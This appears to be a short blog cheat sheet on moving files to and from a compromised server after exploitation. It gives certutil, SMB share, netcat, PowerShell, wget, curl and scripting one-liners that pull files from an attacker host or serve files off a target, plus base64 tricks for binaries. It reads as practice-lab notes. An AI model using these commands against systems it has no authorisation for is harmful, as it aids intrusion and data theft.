banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。

File Transfer and Download in Post-Exploitation

After obtaining the server, you need to upload tools or download files from the server. Different scenarios (network environments) may require different file download tools, which can also be used in shooting ranges. Here is a simple record.

  • windows
certutil -urlcache -split -f "http://<LHOST>/<FILE>" <FILE>

image

  • impacket

Use the impacket-smbserver tool to create an SMB server.

sudo impacket-smbserver <SHARE> ./

Default SMB1 protocol error

image

sudo impacket-smbserver <SHARE> . -smb2support

The -smb2support option enables SMB2 protocol support, which means that clients using the SMB2 protocol can connect to the share.

SMB2 blocks access due to security policies

image

Password needs to be set

sudo impacket-smbserver SHARE ./ -smb2support -username lca -password abc+123

image

  • python
python -m http.server <port>
  • nc

On the VPS

cat user.txt | nc -l 1234
nc -l 1234 < user.txt

On the target machine:

nc <vps_ip> 1234 > user.txt

Note: After the connection is established, it has been tested that the target machine can only receive the data completely after pressing ctrl+c on the VPS, otherwise it will keep getting stuck.

  • powershell
$p = New-Object System.Net.WebClient;$p.DownloadFile("http://1.1.1.1:8000/user.txt","C:\Users\lca\Desktop\user.txt");

image

  • wget
wget http://1.1.1.1/user.txt -O C:\Users\lca\Desktop\user.txt
  • curl
curl http://1.1.1.1:8000/user.txt -o C:\Users\lca\Desktop\user.txt
  • perl
perl -e "use LWP::Simple; getstore('http://1.1.1.1/user.txt', '/tmp/user.txt');"

image

  • python
python -c "import urllib.request;urllib.request.urlretrieve('http://1.1.1.1/user.txt', '/tmp/user.txt')"

image

  • ruby
ruby -ropen-uri -e "open('/tmp/user3.txt', 'wb') { |file| file << URI.open('http://1.1.1.1:8000/user.txt').read }"

image

  • php
php -r "file_put_contents('/tmp/user4.txt', file_get_contents('http://1.1.1.1:8000/user.txt'));"

image

Note: Sometimes, if you want to download files of type exe or jar, you can convert them to base64 format first, and then restore the base64-encoded content after transmission. If there is a size limit, you can also transmit in blocks.

# Encoding
base64 -i xxx.jar > out.txt

# Restoration
base64 --decode -i out.txt -o 1.jar
Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.